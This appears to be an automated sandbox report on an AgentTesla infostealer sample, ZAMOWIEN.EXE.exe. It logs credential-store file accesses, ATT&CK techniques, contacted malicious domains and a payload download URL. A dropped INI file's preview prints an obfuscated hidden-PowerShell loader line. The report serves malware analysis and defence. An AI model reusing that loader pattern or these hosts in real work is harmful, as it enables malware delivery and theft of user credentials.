Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe

Code function: 0_2_00405B9E GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405B9E

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000C.00000002.2530421753.0000000022D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2530421753.0000000022CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7660, type: MEMORYSTR

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior

Source: Yara match	File source: 0000000C.00000002.2530421753.0000000022CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7660, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000C.00000002.2530421753.0000000022D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2530421753.0000000022CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7660, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	311 Process Injection	1 Software Packing	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	11 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	131 Virtualization/Sandbox Evasion	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	311 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ZAMOWIEN.EXE.exe	11%	ReversingLabs
ZAMOWIEN.EXE.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_Error	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
corella.ro	109.73.128.91	true	false	unknown
ftp.rusticpensiune.ro	185.146.87.128	true	true	unknown
www.corella.ro	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.bin	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.binRefosWelwww.creditesimplebm.ro/tmp-image/	msiexec.exe, 0000000C.00000002.2517656375.00000000073D0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_Error	ZAMOWIEN.EXE.exe	false	URL Reputation: safe	unknown
http://crl.micro	powershell.exe, 00000002.00000002.1680629547.00000000077D4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1676066608.0000000005205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1674975257.00000000030AF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.1676066608.00000000050B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.corella.ro/	msiexec.exe, 0000000C.00000002.2511505619.00000000006F2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.bin=	msiexec.exe, 0000000C.00000002.2511505619.00000000006F2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1676066608.0000000005205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1674975257.00000000030AF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	ZAMOWIEN.EXE.exe	false	URL Reputation: safe	unknown
http://ftp.rusticpensiune.ro	msiexec.exe, 0000000C.00000002.2530421753.0000000022D35000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2530421753.0000000022D27000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1676066608.00000000050B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2530421753.0000000022D27000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1676066608.0000000005205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1674975257.00000000030AF000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
109.73.128.91	corella.ro	Spain		49674	DJEMBA-ASRO	false
185.146.87.128	ftp.rusticpensiune.ro	Romania		5588	GTSCEGTSCentralEuropeAntelGermanyCZ	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1527749
Start date and time:	2024-10-07 09:28:48 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ZAMOWIEN.EXE.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@17/10@2/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 94% Number of executed functions: 125 Number of non-executed functions: 28
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 7660 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5896 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: ZAMOWIEN.EXE.exe

Simulations

Behavior and APIs

Time	Type	Description
03:29:43	API Interceptor	41x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
109.73.128.91	24100311.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
185.146.87.128	24100311.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	LisectAVT_2403002A_35.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	COMANDA_AXM_NR17_DIN_240717.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	BESTELLU.EXE.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	Ordine_nr.24061168372.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ftp.rusticpensiune.ro	24100311.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	185.146.87.128
	LisectAVT_2403002A_35.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.146.87.128
	COMANDA_AXM_NR17_DIN_240717.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.146.87.128
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.146.87.128
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.146.87.128
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.146.87.128
	BESTELLU.EXE.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.146.87.128
	Ordine_nr.24061168372.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.146.87.128
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.146.87.128
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	185.146.87.128

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GTSCEGTSCentralEuropeAntelGermanyCZ	g 288322.vbs	Get hash	malicious	GuLoader	Browse	188.241.183.45
	na.elf	Get hash	malicious	Mirai	Browse	94.42.225.83
	na.elf	Get hash	malicious	Mirai	Browse	62.168.37.193
	na.elf	Get hash	malicious	Mirai	Browse	94.42.225.84
	na.elf	Get hash	malicious	Mirai	Browse	94.42.225.74
	arm-20241006-0950.elf	Get hash	malicious	Mirai	Browse	212.38.198.232
	6BTZGMvUv1.elf	Get hash	malicious	Unknown	Browse	89.174.107.71
	24100311.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	185.146.87.128
	novo.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	85.9.53.119
	https://en.softonic.com	Get hash	malicious	Unknown	Browse	62.209.227.210
DJEMBA-ASRO	24100311.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	109.73.128.91
	fxCP7I6KhH.elf	Get hash	malicious	Mirai	Browse	86.106.83.78
	2AoPFpxIKS.elf	Get hash	malicious	Mirai	Browse	86.106.83.74

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	0urFbKxdvL.exe	Get hash	malicious	Unknown	Browse	109.73.128.91
	zncaKWwEdq.exe	Get hash	malicious	Vidar	Browse	109.73.128.91
	file.exe	Get hash	malicious	Clipboard Hijacker, Stealc, Vidar	Browse	109.73.128.91
	setup_installer.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	109.73.128.91
	file.dll	Get hash	malicious	Matanbuchus	Browse	109.73.128.91
	file.dll	Get hash	malicious	Matanbuchus	Browse	109.73.128.91
	zR4aIjCuRs.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.73.128.91
	buildz.exe	Get hash	malicious	Babuk, Djvu	Browse	109.73.128.91
	InstallSetup.exe	Get hash	malicious	Stealc	Browse	109.73.128.91
	Narudzba ACH0036173.vbe	Get hash	malicious	FormBook, GuLoader	Browse	109.73.128.91

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	low
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\Cloud Setting.ini

Process:	C:\Users\user\Desktop\ZAMOWIEN.EXE.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	229
Entropy (8bit):	5.254953762591741
Encrypted:	false
SSDEEP:	6:HH9vtx3eIx90FuCmRAue0i23f1CuaZGHCn8MLVk+WL/9uZMLVkTW:HPBeDGmeZ9CLL1WrfLWW
MD5:	86DEE2D55D3BE02304A44DAED72C2314
SHA1:	28EB08CAEE720462459CE1C58C96773E858F6518
SHA-256:	34009FA385212C3021FB93ED41928217DAA93DF0814ADDDBD55F599B479AA615
SHA-512:	C2BE75AF0E4031CCD18EC1EE3A18E9112A03F82AFB7766C6A63332058ED2ADEED2B6CC540C04A5DBBECE91A06C454859A80C3805D3542CD2248C0FF707C28397
Malicious:	false
Reputation:	low
Preview:	[Ini App]..Load=-windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)" ..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ej0upirj.lcs.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fq4gpvmn.ifd.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlhp5dsk.keg.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whacdxbn.skt.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\deciliteren\afstnings\Krattet.txt

Process:	C:\Users\user\Desktop\ZAMOWIEN.EXE.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	320
Entropy (8bit):	4.34670995732008
Encrypted:	false
SSDEEP:	6:Fg+ZcFCGTQXMRKKRc7fMMRM19eoASDAOAwqxsIe2eN5L3AdrXXDMLQ+:yQGTQcrC7UQK9erXwQpzeXwlXwN
MD5:	0F8645402BA085E744E4A9D6EED52A9D
SHA1:	02362FB57390E3F9A9B39C44AA35FEE313636797
SHA-256:	E0B733763ED72C647150186F894BD8E531E9D00903CCF490E48AE8B824C44C9F
SHA-512:	612496E5DF56D3D34A24420B98163CDA4E2729CEE5EC2CCAF607FE02013646902F0BE4297E7ADFE1E6BB8FCB86F5C48C271460AF7D0455619867EBCC4BDC35C8
Malicious:	false
Preview:	usufructuary phosphation made.incestuse catelectrotonic uoplystes imperturbed toothier rutebil.sundhedspolitiks traductive whincheck,poltinnik kamuflagemalet wordster kkkengrejernes,mirrorizes begnawed conchotome appreter lamentory stampsmen saccharoidal nadijas..eftersommer gomutis orchidocele commendableness pretrim,

C:\Users\user\AppData\Local\Temp\deciliteren\afstnings\Maser52.kon

Process:	C:\Users\user\Desktop\ZAMOWIEN.EXE.exe
File Type:	data
Category:	dropped
Size (bytes):	40072
Entropy (8bit):	1.2574713490480631
Encrypted:	false
SSDEEP:	384:QYikXAGnG39O7V+SaMlIfme35eqrJbVBnm0NeBP:3nX7ws+rf7xVpm0NeN
MD5:	2AB81ADF9BEA2D1BBCEF5EB95EC9E741
SHA1:	96CA2DFA7FBDD2A4B8D014CCB40584D8F1FA0EAA
SHA-256:	F904A63CACD406F9263A08BE7BAD027BCBFC83BE56752F87F63E568877511826
SHA-512:	CE0FA7CA2957CA7632E5042C9D04CC9D371D783596593105BC47835A02331CC68E9872BA1DD11D1535CE840B9D01FF5CEF1EF5DC3B035A9267EC380F434B1142
Malicious:	false
Preview:	...................i...........................l......................t.....z..........................................................................................E...j................-...........,.G...................................$....H..o....2............8............................Z.....................................*........................6.............s.Z.........................z............................................B........................................... ..........................................................................................................................o...H.................4..............................o..............................................................................F..h...../....................................................r...........L.......:......................................................................................................................1.......(................................................

C:\Users\user\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb

Process:	C:\Users\user\Desktop\ZAMOWIEN.EXE.exe
File Type:	ASCII text, with very long lines (3071), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	53183
Entropy (8bit):	5.338730327033852
Encrypted:	false
SSDEEP:	1536:8OVz0fE7uE4vtvko03n0rytHgbzgj0nboBKC480B1gRf:zznQkDEyNcE0MBKCO1mf
MD5:	C7B38EB59906350C5320FBA41407D4A7
SHA1:	2C6B4EDA941D4F23D1D5969FC7CF06E689450DE8
SHA-256:	445C94FA7B8C3F9A7A84BC797FF21109431E9FE512B58D5B4E63581138CB0E61
